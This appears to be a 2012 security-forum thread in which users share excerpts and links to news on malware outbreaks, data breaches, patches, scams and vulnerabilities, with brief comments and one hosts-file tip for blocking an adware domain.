For your protection, EarthLink Virus Blocker has quarantined a message sent to you because it contains a virus.
Note: We do not recommend that you view a message that has a virus attached, even if you have up-to-date antivirus software. However, if you choose to view it anyway, you can: Sign in to Web Mail (https://webmail.earthlink.net), then click the Virus Blocker folder on the left.
Sincerely,
EarthLink Support
By the way, I have never flown on AA.
***
-
***
Government Agencies Get Creative In APT Battle
Strapped for cash and feeling pinched by the increase in targeted attacks, some federal agencies are coming up with their own solutions for better protecting their information
SANS National Cybersecurity Conference -- BALTIMORE, MD. -- A handful of security professionals at the U.S. Department of Energy's laboratories were getting weary of trying to repel advanced persistent threat (APT)-type attacks and keep up with the latest threats. So they decided to roll their own tool to automate intelligence-sharing among the agency's national labs and scores of smaller labs.
"A couple of us were basically tired of losing [the race to keep up with new threat intelligence], so we decided we were going to do something about it. We were tired of getting together in little rooms" to share information, said Matt Myrick, senior cybersecurity engineer at DOE's Lawrence Livermore Laboratory, in a presentation here today. So Myrick and a handful of colleagues from Sandia Labs, Los Alamos Labs, and DOE's Pantex plant wrote a Python-based tool to block malicious websites, hashes, spear-phishing attacks. The so-called Master Block List (MBL) runs on an Apache server and can be integrated with any application to share real-time threat data.
Read more at :
http://www.darkreading.com/threat-intelligence/167901121/security/news/240008438/government-agencies-get-creative-in-apt-battle.html
***
-
***
"I am calling you from Windows": A tech support scammer dials Ars Technica
Cold caller from "Windows Technical Support" asks for remote access to my PC.
When the call came yesterday morning, I assumed at first I was being trolled—it was just too perfect to be true. My phone showed only "Private Caller" and, when I answered out of curiosity, I was connected to "John," a young man with a clear Indian accent who said he was calling from "Windows Technical Support." My computer, he told me, had alerted him that it was infested with viruses. He wanted to show me the problem—then charge me to fix it.
This scam itself is a few years old now, but I had not personally received one of the calls until yesterday—the very day that the Federal Trade Commission (FTC) announced a major crackdown on such "boiler room" call center operations. The very day that six civil lawsuits were filed against the top practitioners. The very day on which I had just finished speaking with Ars IT reporter Jon Brodkin, who spent the morning on an FTC conference call about this exact issue. And here were the scammers on the other end of the line, in what could only be a cosmic coincidence.
See & read much more at :
http://arstechnica.com/tech-policy/2012/10/i-am-calling-you-from-windows-a-tech-support-scammer-dials-ars-technica/
***
-
Microsoft Security Bulletin Advance Notification for October 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-oct
-
Undetectable rootkit making the rounds. TDSS/TDL4 malware infecting the MBR, see the write up here: https://blog.damballa.com/archives/1810
Kudo's for the discussion there go to Damballa labs's Manos Antonakakis, Jeremy Demar, Kevin Stevens and David Dagon. Infected machines are used for clickfraud. Would be interestin g to know if ZeroVulnerability's Exploit Shield protects against this infection?
polonus
-
***
Skype Worm Spreads Ransomware, Botnet Links
Security researchers are warning Skype users about an ongoing attack that dupes people into loading a link that spreads malware.
...... the attack has resulted in infected users spamming their contact lists with messages in both English and German. The English version of the message states: "lol is this your new profile pic?" along with a URL. The message in German is similar.
In both cases, the shortened URL eventually redirects to a download on hotfile.com that pulls down an archive named "Skype_todaysdate.zip” containing a single executable file of the same name.
Read more at :
http://www.eweek.com/security/skype-worm-spreads-ransomware-botnet-links/?kc=EWKNLEDP10102012B
***
-
The results of testing of antivirus products for the treatment of active infection (October 2012)
http://translate.google.ru/translate?sl=ru&tl=en&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http%3A%2F%2Fwww.anti-malware.ru%2Fmalware_treatment_test_2012
-
JavaScript Worm on Steriods
Symantec Blog here: http://www.symantec.com/connect/blogs/javascript-worm-steroids (http://www.symantec.com/connect/blogs/javascript-worm-steroids) !!!
-
Security Vulnerability in Firefox 16
http://blog.mozilla.org/security/2012/10/10/security-vulnerability-in-firefox-16/
-
Firefox 16.0.1 is available and should fix the problem!
-
Japanese malware will put an innocent computer user in jail!
http://www.symantec.com/connect/blogs/malware-dubbed-remote-control-virus-japanese-media-used-make-death-threats-japan (http://www.symantec.com/connect/blogs/malware-dubbed-remote-control-virus-japanese-media-used-make-death-threats-japan)
-
***
New computer virus targets Venezuelans after vote
A newly detected computer virus aims to steal Venezuelans' online credentials using a link that purports to reveal information about the country's recent presidential election, the digital security company Kaspersky Lab said on Friday.
The malicious software was launched after Venezuela's Oct. 7 presidential election and was spread by email, said Dmitry Bestuzhev, head of the Moscow-based company's research and analysis team in Latin America.
At least 75 Kaspersky customers came under attack by the malware, and non-customers surely did, too, he said.
Bestuzhev said in a blog post on Friday that the malicious file is named "listas-fraude-electoral.pdf.exe," which translates as "electoral fraud lists" — a title likely to make some Venezuelans curious after President Hugo Chavez's re-election victory.
Read more at :
http://my.earthlink.net/article/tec?guid=20121012/46cc37a8-964a-4c93-9946-8aa790aad6ea
***
-
***
Cyberthieves loot $400,000 from city bank account
Cybertheft comes just days after RSA issued a warning that criminal gang planned massive attacks against U.S. banking customers
Burlington, Wash. officials have notified hundreds of employees and residents that their bank account information was compromised last week when hackers broke into city systems and stole more than $400,000 from a city account at Bank of America.
Among those impacted by the breach are employees participating in Burlington's electronic payroll deposit program and utility customers enrolled in the city's autopay program for sewer and storm drain charges.
In an alert issued this morning, city administrator Bryan Harrison said all autopay customers should assume that their name, bank account number and routing number was comprised following an intrusion into a city utility billing system.
I am glad I do not use Bank of America. This is the third time this year they have been compromised which shows a lack of proper Internet security on the bank's part.
Read more at :
http://www.computerworld.com/s/article/9232372/Cyberthieves_loot_400_000_from_city_bank_account
***
-
***
Windows 7 malware infection rate soars in 2012
But 2009 OS still 2X-3X less likely to get hacked than 11-year-old XP
Windows 7's malware infection rate climbed by as much as 182% this year, Microsoft said today.
But even with that dramatic increase, Windows 7 remained two to three times less likely to fall to hacker attack than the aged Windows XP.
Data from Microsoft's newest twice-yearly security report showed that in the second quarter of 2012, Windows 7 was between 33% and 182% more likely to be infected by malware than in the second quarter of 2011.
"This may be caused in part by increasing acceptance and usage of the newest consumer version of Windows," said Microsoft in its latest Security Intelligence Report. "Early adopters are often technology enthusiasts who have a higher level of technical expertise than the mainstream computing population. As the Windows 7 install base has grown, new users are likely to possess a lower degree of security awareness than the early adopters and be less aware of safe online practices."
But other elements came into play, argued Tim Rains, director of Microsoft's Trustworthy Computing group.
Read more at :
http://www.computerworld.com/s/article/9232188/Windows_7_malware_infection_rate_soars_in_2012?source=toc
***
-
***
Microsoft patches 20 bugs, including critical Word flaw
Microsoft today patched 20 vulnerabilities in Word, Office, Windows, SharePoint Server, SQL Server and other products in its portfolio, including a critical bug in the company's popular Word program and another already used to attack the company's own online services.
Of Tuesday's seven security updates, one was labeled "critical," Microsoft's most-severe threat ranking, while the others were pegged as "important," the next-most-serious rating.
The critical update for Word affected all versions of Microsoft's word processor on Windows, including Word 2003, 2007 and 2010; Word Viewer, the add-on that lets users who don't own Word view and print documents; and Office Web Apps, the free online editions of Word, Excel, PowerPoint and OneNote.
Read more at :
http://www.computerworld.com/s/article/9232207/Microsoft_patches_20_bugs_including_critical_Word_flaw?source=toc
***
-
***
Mozilla yanks Firefox 16 one day after release
Critical vulnerability overlooked or introduced by previous patching; fix due Thursday
Mozilla yesterday took the unusual step of yanking Firefox 16 from distribution just a day after its release.
The company said a critical vulnerability triggered the move.
The bug was apparently overlooked by Mozilla while it was developing Firefox 16, or introduced by the fixes baked into the upgrade that started reaching users early Tuesday.
"Mozilla is aware of a security vulnerability in the current release version of Firefox (version 16). Firefox version 15 is unaffected," said Michael Coates, Mozilla's director of security assurance, in a Wednesday post to the company's security blog.
Read more at :
http://www.computerworld.com/s/article/9232282/Mozilla_yanks_Firefox_16_one_day_after_release?source=toc
***
-
***
Facebook connects with AVAST to protect users
AVAST Software has teamed up with Facebook to help you and your friends stay safe. AVAST is sharing its Virus Lab data with Facebook in the combined attempt to prevent malware being shared unknowingly by Facebook users. Whenever someone clicks a link within Facebook, Facebook checks the URL in the AVAST cloud, in real time. If the URL is infected, the user sees a message warning of the potential threat.
Read more at :
http://blog.avast.com/2012/10/16/facebook-connects-with-avast-to-protect-users/
***
-
Santander's online banking keeps passwords in cookies
http://www.h-online.com/security/news/item/Santander-s-online-banking-keeps-passwords-in-cookies-Update-1730364.html
-
Unbelievable!
-
***
That is a terrible practice but I would bet more banks than you would think do the same thing.
***
-
***
Cyber-Security Threats Unaddressed by Small Businesses
Small-business owners are woefully unprepared when it comes to protecting their companies from various forms of internal and external security threats.
When it comes to security, small and midsize businesses are largely unaware of the risks they face, according to a survey of 1,015 U.S. SMBs by the National Cyber Security Alliance (NCSA) and security specialist Symantec. The report found more than three-fourths (77 percent) of respondents said their company is safe from cyber-threats, such as hackers, viruses, malware or a cyber-security breach, yet 83 percent have no formal cyber-security plan.
One encouraging finding was that companies founded in the wake of the economic crisis are almost 20 percent more likely than older small businesses to have a written plan in place for keeping their business secure from cyber-threats.
Read more at :
http://www.eweek.com/security/cyber-security-threats-unaddressed-by-small-businesses-symantec/?kc=EWKNLEDP10182012D
***
-
The Biggest Troll on the Web
http://gawker.com/5950981/unmasking-reddits-violentacrez-the-biggest-troll-on-the-web
http://cnnpressroom.blogs.cnn.com/2012/10/18/ac360-video-preview-exclusive-invu-w-reddit-jailbait-moderator-michael-brutsch-tonight/
-
How to fail at nuclear espionage
http://blogs.norman.com/2012/security-research/how-to-fail-at-nuclear-espionage
-
HP asks researcher not to publish security vulnerabilities
http://www.h-online.com/security/news/item/HP-asks-researcher-not-to-publish-security-vulnerabilities-1733216.html
-
***
HSBC confirms cyber attack
A cyber attack targeted HSBC websites this week, preventing customers from using HSBC online services, including internet banking.
A day after the Oct. 18 attack, the global financial firm released a statement saying that “some sites” are operating again. The denial of service attack did not affect customer data, the bank said.
A spokesperson could not say whether HSBC commercial banking customers in Western New York were impacted.
Several banks around the country have encountered cyber attacks in recent weeks. Capital One Financial Corp. and BB&T Corp. were also targeted this week.
Read more at :
http://www.bizjournals.com/buffalo/news/2012/10/19/hsbc-confirms-cyber-attack.html
***
-
***
Social engineering is a growing threat to computer security
Some companies protect their computer systems with expensive technology, but they often overlook the employee who may be conned into unlocking private information and giving it away to anyone who asks for it.
Technology security experts like Nathan LaFollette are hired to test computer systems for vulnerabilities -- both inside and outside the building. He said the human element is often the weakest link and can be exploited by social engineering. He says hackers sometimes find it easier to trick an employee to reveal passwords than finding their own way through computer firewalls.
Experts at technology firms like Cisco report that hackers are constantly using social engineering techniques that take advantage of real employee names, partial passwords or use schemes to convince employees they're involved in legitimate transactions.
"Social engineering is a huge threat for corporations, but they don't spend a lot of money or training on it," said LaFollette, founder and chief executive officer of Inet\Detect in Brunswick. "It's a major problem that will continue to grow and it's not something that you can just throw products at to remediate."
See & read more at :
http://www.cleveland.com/business/index.ssf/2012/10/social_engineering_is_a_growin.html
***
-
***
Real-Time Cyber-Attack Map
"In October, two German computer security researchers created a map that allows you to see a picture of online cyber-attacks as they happen. The map isn't out of a techno-thriller, tracking the location of some hacker in a basement trying to steal government secrets. Instead, it's built around a worldwide project designed to study online intruders. The data comes from honeypots. When the bots go after a honeypot, however, they're really hacking into a virtual machine inside a secure computer. The attack is broadcast on the map—and the researchers behind the project have a picture of how a virus works that they can use to prevent similar attacks or prepare new defenses."
Read at :
http://it.slashdot.org/story/12/10/19/2344253/real-time-cyber-attack-map?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Slashdot%2Fslashdot+%28Slashdot%29
See active map at :
http://map.honeynet.org/
-
Spammers spoof shortened links ending on .gov: http://www.symantec.com/connect/blogs/spam-gov-urls (link author: eric park on Symantic Community: Connect)
example 15% of all clicks on 1 dot usa dot gov go to spam...
polonus
-
It is a shame that this technology is insecure and spreads information to potential burglers that residents are not at their homes.
Read this articles on the insecurity of read-out of smartmeters: http://www.winlab.rutgers.edu/~gruteser/papers/fp023-roufPS.pdf
Article authors are Ishtiaq Rouf∗, Hossen Mustafa∗,Miao Xu, Wenyuan Xu†
University of South Carolina, Rob Miller Applied Communication Sciences, Marco Gruteser Rutgers University
polonus
-
***
White House Denies Networking Firm Huawei Cleared of Spying for China
No review has cleared Huawei or any other vendor supplying telecommunications equipment to U.S. firms of spying allegations, a White House official said.
The White House is denying a media report that an investigation into corporations supplying U.S. telecommunications companies with equipment found no proof Huawei Technologies was involved in espionage on behalf of China.
Citing anonymous sources, Reuters reported that an 18-month examination of Huawei's communications equipment revealed the products contained security vulnerabilities that could be exploited by hackers, but not evidence the company had spied on the United States.
Read more at :
http://www.eweek.com/networking/white-house-denies-networking-firm-huawei-cleared-of-spying-for-china/?kc=EWKNLEDP10222012E
***
-
***
Android Malware Takes off, Mostly Outside the U.S.
A very compelling reason to be using Avast Mobile Security on Android devices
Attackers are continuing to focus more heavily on mobile devices, and in particular those running Google’s Android operating system, posting 175,000 malicious or suspicious programs to app stores.
The activity in the third quarter is a steep increase from the previous quarter when the firm only found 30,000 apps that appeared to take malicious actions or aggressively gather information on a user.
Read more at :
http://www.eweek.com/security/android-malware-takes-off-mostly-outside-the-u.s./?kc=EWKNLEDP10232012E
***
-
Google Drive opens backdoor to Google accounts
http://www.h-online.com/security/news/item/Google-Drive-opens-backdoor-to-Google-accounts-1735069.html
-
Yahoo Messenger Malvertising Hijacks Your Browser Start Page to Vietnamese Portal (http://www.hotforsecurity.com/blog/yahoo-messenger-malvertising-hijacks-your-browser-start-page-to-vietnamese-portal-4021.html?goback=%2Egde_1003727_member_178260803)
" until removal tool is readygo to http://technet.microsoft.com/en-us/sysinternals/bb545027 (http://technet.microsoft.com/en-us/sysinternals/bb545027)
download & execute: autoruns
look after “Laban.vn” and disable it[/size][/font]
additionally you can add this line in hosts file
127.0.0.1 laban.vn "
-
***
'Password' is still the worst password, but watch out for 'ninja'
Although the tech world is always changing, one thing remains the same: A lot of people use terrible passwords.
Splashdata, a security software developer, released its annual list of the most common passwords on the Internet. Once again, “password,” “123456,” and “12345678” are the three most popular, in that order.
The list of most common passwords is based on file dumps from online hackers. Splashdata notes that 2012 saw several high-profile security breaches, including Yahoo, LinkedIn, eHarmony, and Last.fm. The company says it releases its annual list to raise awareness of bad passwords ......
See the list & read more at :
http://www.pcworld.com/article/2013012/password-is-still-the-worst-password-but-watch-out-for-ninja.html
***
-
***
Barnes & Noble says pin pads in 63 stores hacked
Barnes & Noble Inc. said Tuesday that devices used by customers to swipe credit and debit cards have been tampered with in 63 of its stores in nine states.
The New York-based bookseller said in a statement Tuesday only one of the devices, known as PIN pads, was tampered with in each of the 63 stores. The stores are in California, Connecticut, Florida, Illinois, Massachusetts, New Jersey, New York, Pennsylvania and Rhode Island.
Read more at :
http://blog.al.com/wire/2012/10/barnes_noble_says_pin_pads_in.html
***
-
***
Campbell River RCMP issues computer virus alert for 'sophisticated screen' that takes over monitor
Campbell River RCMP has issued a warning about a new computer virus affecting local computers.
The virus locks your computer and displays a sophisticated screen with the message: "Police Cybercrime Investigation Department. Your computer has been locked!" Beside the title is a coat of arms similar to the RCMP's, labelled "Canadian Pacific Police Service."
This is not an existing police agency, the RCMP says. The virus takes over your webcam and displays a live-streaming video of yourself on the screen along with other messages and instructions.
See & read more at :
http://www.timescolonist.com/news/Campbell+River+RCMP+issues+computer+virus+alert+sophisticated/7432776/story.html
-
***
Spying Eyes Are Watching You
Now that the Cold War is a distant memory and James Bond movies just ain’t what they used to be, you may think that the spy game is dead. Well, think again. A new report from the Office of the National Counterintelligence Executive, charmingly called ONCIX, tells quite a different story.
Espionage against the United States is a “significant and growing threat to the nation’s prosperity.” Spying is, in fact, even worse than it was in the salad days of Smiley’s people because of the advent of ... you guessed it: the Internet. Says ONCIX: “Cyberspace—where most business activity and development of new ideas now takes place—amplifies ... threats by making it possible for malicious actors ... to quickly steal and transfer massive quantities of data while remaining anonymous and hard to detect.”
Read more at :
http://www.baselinemag.com/c/a/Intelligence/James-Bond-Lives-746971/
***
-
***
Dos/DDoS Attacks Grow in Complexity
As GoDaddy and Bank of America recently discovered, denial of service (DoS) attacks and distributed denial of service (DDoS) attacks are commonplace and increasingly sophisticated
Denial of service (DoS) attacks and distributed denial of service (DDoS) attacks are a vexing problem for organizations. What's more, as GoDaddy and Bank of America recently discovered, they're commonplace and increasingly sophisticated. Hackers use these techniques to take down sites and damage a company's reputation or bottom line. Unfortunately, "Every site is a potential target," observes Tal Beery, security researcher for Imperva.
Imperva's September Hacker Intelligence report, “Denial of Service,” provides some insight into the current state of DoS and DDoS, which are increasingly used by groups such as Anonymous and LulzSec to support their goals and promote their messages. A growing problem, the report notes, involves hackers executing DDoS attacks by analyzing the technical tools and trends deployed during several recent hacking operations.
Read more at :
http://www.baselinemag.com/security/dosddos-attacks-grow-in-complexity/
***
-
***
Public Privacy and the Glass House
We must live with the fact that we cannot protect the Internet environment when we live in a glass house—a characterization of how insecurity pervades our world.
There always has been tension between functionality and security, and likely always will be. Functionality usually wins out because we can calculate the ROI value for functionality, but calculating ROI for security is problematic.
Efforts to forecast the consequences of a future breach, leak or insider theft rapidly break down. They sound like hollow warnings by Henny Penny that the sky is falling. It's uncomfortable—and often professionally suicidal—to make projections for costs and likely consequences for cyber-threats.
Read much more at :
http://www.baselinemag.com/security/public-privacy-and-the-glass-house/
***
-
***
Israel Police disconnect from Internet, fearing cyber war
Officers ordered to be extra careful with computers following fears of an attack; unclear if breach was wide-scale attack or virus.
Investigators from the Israel Police information security branch are on the trail of a viral break-in of the national police computer system, which forced the police to take their operations off-line on Wednesday, and issue strict computer security guidelines to officers.
On Thursday, police announced that they had ordered all officers to no longer use the Internet on police computers and avoid using thumb drives or CDs, or any other passing of data and programs between police computers. They said the decision was made after an infiltration of some sort in the police computer system raised flags in the computer security department of the police.
Read more at :
http://www.jpost.com/NationalNews/Article.aspx?id=289260&R=R2
***
-
***
Massive Data Breach Hits South Carolina State Tax System
The latest breach shows that state and local governments as well as private corporations need to better lock down their data and perform regular security assessments, security experts say.
The theft of approximately 3.6 million Social Security numbers and information on 387,000 credit and debit card accounts is yet another reminder that all IT operations should lock down their sensitive data by segmenting their networks, using better access controls, and regularly performing vulnerability assessments, security experts said.
On Oct. 26, the South Carolina Department of Revenue announced that attackers had breached its systems in September, following two previous attacks in August. The attacks exploited an unspecified vulnerability in the system, which the state agency closed on Oct. 20. The online thieves who breached its network took a large amount of sensitive information on any taxpayers that had filed tax returns since 1998.
Read more at :
http://www.eweek.com/security/massive-data-breach-hits-south-carolina-state-tax-system/
***
-
Phishing attack promises a free version of Windows 8 (http://nakedsecurity.sophos.com/2012/10/29/phishing-attack-windows-8/)
(http://sophosnews.files.wordpress.com/2012/10/windows8-phish-email.jpg?w=640)
Don't be fooled. If you want windows 8, buy it. You can't get if for free!
-
Telefónica wants to turn customer data into cash
http://www.h-online.com/security/news/item/Telefonica-wants-to-turn-customer-data-into-cash-1739251.html
-
Free e-books could infest thousands of tablets through malcious javascript: ePub 3 standard leaves room for interactive elements using javascript, opening the door to malcious hacker exploits: http://www.eburon.nl/301012_gratis_ebook_infecteert_tienduizenden_tablets_met_trojan -> article author Wiebe de Jager
( 30-10-12 15:13 ) This could mean a serious threat in the foreseeable future,
polonus
-
Thousands and thousands of firms can be easily hacked through SNMP through bad configuration of routers and ADSL modems:
http://www.securitypronews.com/securitypronews-24-20030909SNMPEnumerationandHacking.html
Link article by Mati Aharoni
First it was thought it was only a printer related problem, but the situation is far worse as iniitially assumed.
And as we read from the link the threat already existed in 2005.
See this Dutch newspaper article
http://www.telegraaf.nl/digitaal/13140020/__13.656_bedrijven_zo_te_hacken__.html
polonus
-
New vicious UEFI bootkit vuln found for Windows 8 (http://www.theregister.co.uk/2012/09/19/win8_rootkit/?goback=%2Egde_1003727_member_181335821)
Certainly not good news.
-
Don't social network on you and yours being away for a social gathering nearby. Burglars may read your messages and bring a visit to the premishes.
Keep your private affairs private.
polonus
-
***
Malware Infects About 13 Percent of Home Networks: Kindsight Report
A network security provider finds that 13 percent of home networks in North America are infected with malware, including 2.2 million systems infected with the botnet using compromised systems for click fraud.
Malware continues to plague home users, with about 13 percent, or nearly one-in-seven home networks showing signs of at least one compromised system, network security firm Kindsight stated in a report published on Oct. 30.
The firm, which provides security services to major Internet service providers, can detect when computers are trying to communicate with a malicious domain or server. In the third quarter of 2012, some 6.5 percent of home networks showed signs of hosting highly dangerous malware, such as a banking trojan or bot software, while 8.1 percent showed signs of more moderate infections, such as adware or spyware. Some networks had both types of infections.
Read more at :
http://www.eweek.com/security/malware-infects-about-13-percent-of-home-networks-kindsight-report/
***
-
Vupen brags about Windows 8 hack
http://www.h-online.com/security/news/item/Vupen-brags-about-Windows-8-hack-1742332.html
-
Trojan bargain with Windows 8 support
http://www.h-online.com/security/news/item/Trojan-bargain-with-Windows-8-support-1740800.html
-
Speculation over Facebook access via Google index
http://www.h-online.com/security/news/item/Speculation-over-Facebook-access-via-Google-index-1742538.html
-
New zero-day in Adobe-X exploited in blackhole kit malware: http://www.group-ib.com/index.php/7-novosti/672-group-ib-us-zero-day-vulnerability-found-in-adobe-x%22
polonus
-
***
Security Researcher Finds Critical Flaws in Sophos Anti-Virus Engine
Multiple vulnerabilities uncovered by security researcher Tavis Ormandy could have permitted attackers to remotely execute code or cause other problems for Sophos Anti-Virus.
Security vendor Sophos has plugged a series of security holes in its antivirus product that were uncovered by a security researcher. In some cases, these security holes could have been exploited to cause crashes or to remotely execute code, according to the researcher.
Sophos says it has already patched most of flaws discovered by Ormandy and will release patches for additional issues Nov. 28.
"The paper includes a working pre-authentication remote root exploit that requires zero-iteration, and could be wormed within the next few days," he explained. "I would suggest administrators deploying Sophos products study my results urgently, and implement the recommendations."
"A working exploit for Sophos 8.0.6 on Mac is available; however, the techniques used in the exploit easily transfer to Windows and Linux, due to multiple critical implementation flaws described in the paper," he added.
Read more at :
http://www.eweek.com/security/security-researcher-finds-critical-flaws-in-sophos-anti-virus-engine/
***
-
***
Anonymous Hackers Claim Protest Attacks Hit Zynga, Facebook, Others
Hackers with the group Anonymous have apparently chosen computer gaming vendor Zynga and social networking powerhouse Facebook as the latest targets of a campaign that aims to reel in the power and wealth of the companies.
In a Nov. 5 post on the AnonNews Website, the group says it is taking the actions because of recent developments at Zynga, including the reported layoffs of some workers.
Read more at :
http://www.eweek.com/security/anonymous-hackers-claim-protest-attacks-hit-zynga-facebook-others.html
***
-
***
100K Google Android Apps Pose Potential Security Risk: Bit9 Report
A mobile security report from security vendor Bit9 said that 100,000 applications it examined on Google Play were questionable or suspicious due to the types of permissions they requested, the reputation of the application's publisher and other factors.
Bit9's criteria for defining an application as "questionable" or "suspicious" included permissions requested by the application, categorization of the application, user rating, number of downloads and the reputation of the application's publisher.
In its examination of more than 400,000 Android apps, Bit9 found 72 percent use at least one high-risk permission. In addition, 42 percent of the apps access GPS location data, including wallpapers, games and utilities; 31 percent access phone calls or phone numbers; 26 percent access personal data, such as contacts and email; and 9 percent use permissions that can cost the user money.
"Most consumers are willing to click “allow” for mobile apps in situations they probably would never have allowed on a Windows computer," he said. "This is because people do not yet consider their smartphones as vulnerable or as sensitive as they do their desktops and laptops; even those smartphones are essentially just smaller computers, and debatably store even more personal information than the average laptop."
"Another problem is that there are dozens of different permissions on an Android device," he added. "The disclosure dialog box cannot list or properly explain them all. Even if it could, some are simply too esoteric or technical for an ordinary consumer to understand. If the warning described the possibly risks, not just the permission requested, that might help, but then you would be talking about a dialog box as large as a license agreement—how many people actually read license agreements in full?"
Read more at :
http://www.eweek.com/security/100k-google-android-apps-pose-potential-security-risk-bit9-report/
***
-
***
Hackers claim attacks against ImageShack, Symantec, other websites
Different hacker groups claim to have breached servers belonging to ImageShack, Symantec, and other organizations.
Update, November 7: This story initially reported that HTP had targeted Paypal. Paypal has since issued a statement that it has not suffered a security breach and the Cyberwarnews.info story that reported the payment processing company had been the victim of an 0 day exploit has been updated to state that ZPanel had been targeted by hackers, not Paypal.
On Sunday, a hacker group called HTP claimed to have compromised Web servers, MySQL databases, routers and management servers used by the ImageShack and yfrog image hosting services.
ImageShack did not immediately return a request for comment.
In the same post, HTP claims to have hacked servers belonging to Symantec. The leaked data includes information the hackers claim to have copied from a Symantec database, including the names, email addresses and hashed passwords of hundreds of users. Many of the email addresses are on the @symantec.com domain.
Read more at :
http://www.computerworld.com.au/article/441022/hackers_claim_attacks_against_imageshack_symantec_other_websites/
***
-
***
Hackers Love Android Gingerbread
Running outdated software on your smartphone can make you an easy target for malware and viruses. The latest report by Russian security firm Kaspersky Lab reveals that 28% af all Android phones infected by malware are running Gingerbread, the operating system’s 2.3.6 version, released in September 2011.
That high number has something to do with the fact that more than half of Android devices in the market run that version of the software. Ice Cream Sandwich, ranked second, with 23% of the attacks, despite having a market considerably lower than Gingerbread — only one in four Android phones is running this version.
Read more at :
http://mashable.com/2012/11/08/hackers-love-android-gingerbread/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Mashable+%28Mashable%29
***
-
***
Zero-day PDF exploit reportedly defeats Adobe Reader sandbox protection
Cyber criminals are using a new PDF exploit that bypasses the sandbox security features in Adobe Reader X and XI, in order to install banking malware on computers, according to researchers from Russian security firm Group-IB.
The zero-day exploit -- an exploit for a previously unknown and unpatched vulnerability -- has been integrated into a privately modified version of Blackhole, a commercial Web-based attack toolkit, the Group-IB researchers announced Wednesday.
Read more at :
http://www.infoworld.com/d/security/zero-day-pdf-exploit-reportedly-defeats-adobe-reader-sandbox-protection-206657?source=rss_
***
-
Hi CharleyO,
Did you see this? Re: http://forum.avast.com/index.php?topic=52252.msg860586#msg860586
Well one should always be warned twice in the case of a zero day, I think, ;D
polonus
-
***
Sorry about that, Polonus, as I should have read farther back. But, as you said, being warned twice is not too many times in this case. ;)
***
Future Flash security updates will be synchronized with Microsoft's monthly patch schedule
Adobe on Tuesday announced it will pair future security updates for its popular Flash Player with Microsoft's Patch Tuesday schedule.
At the same time, Adobe issued an update that patched seven critical Flash vulnerabilities, and Microsoft shipped fixes for Internet Explorer 10 (IE10), which includes an embedded copy of Flash.
Even though the Flash updates will add more Patch Tuesday work for users, security professionals praised Adobe's change. "Concentrating updates on a single day is a benefit for any organization that manages patch roll-outs," said Wolfgang Kandek, CTO of Qualys, in an email. "That way the update can be handled by the same decision process, which should streamline roll-outs and get Flash updates [installed] more widely."
Read more at :
https://www.infoworld.com/d/security/adobe-now-married-microsoft-moves-flash-updates-patch-tuesday-206571?source=rss_
***
-
***
In this thread, what is usually posted is closer to "doom & gloom" than anything else. But, below is a little ray of sunshine.
New online game trains kids against cyber attacks
The National Science Center, or NSC, is now training kids to stay safe from cyber attack malware when they’re surfing the web or using email and cell phones. A new online game called Cyber Swarm Defenders is targeted to 6th-8th grade students and is also appropriate for younger students.
The game is part of the NSC’s newest Cyber Ops education outreach program. The NSC is a public-private partnership between the U.S. Army and NSC, Inc., that uses its resources to stimulate and increase science, technology, engineering, and mathematics, known as STEM, proficiency in U.S. students, especially those in grades 4-9.
“Anything we can do to make the young students of our country understand the cyber threat and get them excited about STEM technologies has a big payoff,” said Ron Ross, chairman of the NSC.
Read more at :
http://www.defencetalk.com/new-online-game-trains-kids-against-cyber-attacks-45388/
***
-
Security issue discovered in TOR client
http://www.h-online.com/security/news/item/Security-issue-discovered-in-TOR-client-1746884.html
-
Microsoft Security Bulletin Advance Notification for November 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-nov
-
Exclusive: John McAfee Wanted for Murder (Updated
http://gizmodo.com/5959812/john-mcafee-wanted-for-murder
http://www.dailymail.co.uk/news/article-2149904/John-McAfee-arrested-Belize-police-claim-running-meth-lab.html
-
update on the above...
3 detained in killing of Internet pioneer's neighbor in Belize
http://edition.cnn.com/2012/11/13/world/americas/belize-mcafee-killing/index.html?iref=allsearch
-
Adobe confirms customer data breach
http://www.h-online.com/security/news/item/Adobe-confirms-customer-data-breach-1750344.html
-
XSS hole on ebay dot com stiil open: http://blog.aegislab.com/index.php?op=ViewArticle&articleId=228&blogId=1
polonus
-
Malware Targeting Windows 8 Uses Google Docs
http://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs
-
***
Judge approves FTC's $22.5M fine of Google
A federal judge has approved a $22.5 million fine to penalize Google for an alleged privacy breach, rejecting a consumer-rights group's plea for tougher punishment.
The blessing from U.S. District Judge Susan Illston came late Friday. She made her ruling a few hours after a hearing in San Francisco for final arguments about a fine that's the cornerstone a settlement reached three months ago between the Federal Trade Commission and Google Inc.
The rebuke resolves around allegations that Google duped millions of Web surfers using the Safari browser into believing their online activities couldn't be tracked by the company as long as they didn't change the browser's privacy settings. That assurance was posted on Google's website earlier this year, even as the Internet search leader was inserting computer coding that bypassed Safari's automatic settings and enabled the company to peer into the online lives of the browser's users.
The FTC concluded that the contradiction between Google's stealth tracking and its privacy assurances to Safari users violated a vow the company made in another settlement with the agency last year. Google had promised not to mislead people about its privacy practices.
Read more at :
http://my.earthlink.net/article/tec?guid=20121116/490a38cf-45a5-426e-ab6f-62aca8797276
***
-
***
Anonymous hack hundreds of Israeli websites, delete Foreign Ministry database in support of Gaza
Hacker group Anonymous has launched a massive attack named #OpIsrael on almost 700 Israeli websites, protesting against Operation Pillar of Defense in Gaza. Israeli media confirmed the group’s move.
The hackers reportedly took down websites ranging from high-profile governmental structures such as the Foreign Ministry to local tourism companies’ pages.
The biggest attack as of now has been the Israeli Foreign Ministry’s international development program, titled Mashav. Anonymous announced on Twitter they’ve hacked into the program’s database, with the website remaining inaccessible at the moment.
Read more at :
http://rt.com/news/anonymous-gaza-israel-website-938/
***
-
PASSTEAL Sneaks into Users Systems via File Sharing Sites
http://blog.trendmicro.com/trendlabs-security-intelligence/passteal-sneaks-into-users-systems-via-file-sharing-sites/
-
Securebrowserupdate is malvertising fraudulous malcode: http://stopmalvertising.com/malvertisements/securebrowserupdate.com-wants-to-update-your-browser-with-malware.html
polonus
-
Professional trojan targets SEPA transactions
http://www.h-online.com/security/news/item/Professional-trojan-targets-SEPA-transactions-1754446.html
-
